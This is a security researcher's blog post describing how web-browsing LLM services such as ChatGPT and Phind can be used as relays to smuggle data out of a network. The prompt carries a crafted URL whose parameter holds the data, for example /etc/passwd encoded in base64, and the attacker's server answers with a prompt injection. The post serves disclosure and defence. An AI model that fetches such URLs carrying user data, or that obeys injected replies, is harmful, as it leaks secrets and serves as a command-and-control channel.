Covert Data Exfiltration via LLMs: Uncovering the Hidden Risks

Michael Nieto
4 min readJan 13, 2024

--

1/12/2024

DALL-E’s representation of a firewall struggling to detect data exfil.

In this article, I will write about how it’s possible to covertly exfiltrate sensitive data via LLM’s ability to access the internet with simple prompts.

My target is online search services that use LLMs to browse the internet, for example, Phind.com, ChatGPT Browse with Bing, etc.

In theory, this technique can be used to:

  • Bypass DLP to exfiltrate sensitive data (credit card numbers, SSH keys, etc)
  • Command and control communication.
  • Transfer small files.
  • Expose LLM’s backend server’s IP addresses.
Exfil data via LLM diagram.

How it works:

  1. The attacker sends a prompt to LLM with a crafted URL. If packet inspection is not enabled on the network, this will look like a normal user going to their favorite internet browsing LLM app.
  2. Even if packet inspection is enabled, the traffic can be hidden within a large block of text prompt, making it difficult to detect.
  3. The LLM sends a GET request to the crafted URL. The URL is a web app that can grab the request and do whatever it needs to do. For example, in the example below it replies with a secret message by completing a prompt injection.

In the example below I used the parameter “p=Microsoft Windows 10 Home” then the script returns a prompt telling the LLM to return a secret value. Thus completing a prompt injection attack.

Video showing crafted response after prompt injection is successful.

Attacker’s PoC

I configured a web server that responds to GET requests with the parameter ‘p’ depending on the data it receives. If no parameter is sent the website shows a decoy site. For this, I used a simple Flask app https://raw.githubusercontent.com/mikensec/scripts/master/app.py

Choosing an LLM

I tested multiple LLMs and most did not allow web browsing, but I think in the future when more LLMs are configured to browse the internet via plugins, they can be abused as relays to bypass local network restrictions. I was able to use ChatGPT and Phind.com as relays.

ChatGPT relayed the data I provided in the parameters if I kept the parameter to a reasonable length.

Phind.com allowed me to send the whole contents of /etc/passwd encoded as a base64 string over the request and allowed a remote prompt injection from my web server.

Testing

The attacker sends a prompt to the LLM web app with a URL.
For example https://poc.michaelnieto.com/aadf4adfg5h4?p=secretmessagehere

At this point, the ChatGPT used Search with Bing plugin, took my URL, and sent a GET request.

The string arrived via HTTPS from the Openai servers.
Openai’s IP’s reaching out to my server.

The web server then grabs the parameter p and does whatever it wants. At this point, the data already left the local network.

Conclusion

Could this be detected? Yes, but in my opinion it’s very difficult. Is your proxy/DLP/firewall device reading all LLM prompt requests and can sift through all the noise? Most businesses don’t use SSL packet inspection because of the hassle.

How can your infrastructure detect a well-obfuscated URL, or hidden server on a subdomain of a legit service? For example, if your developers use Heroku or AWS EC2 etc. are you keeping track of all the custom URLs that need to be allowed?

If you’re blocking ChatGPT etc. Are you blocking all the other LLMs out there that browse the internet? A new LLM service pops up every day.

As Large Language Models (LLMs) evolve in complexity and their adoption in the corporate sector increases, it is important to acknowledge that, like any technological tool, they are susceptible to misuse. Individuals with malicious intent could potentially leverage these models for novel cyber-attacks, unauthorized data extraction, command and control (C2) communications, or the distribution of malware.

--

--

No responses yet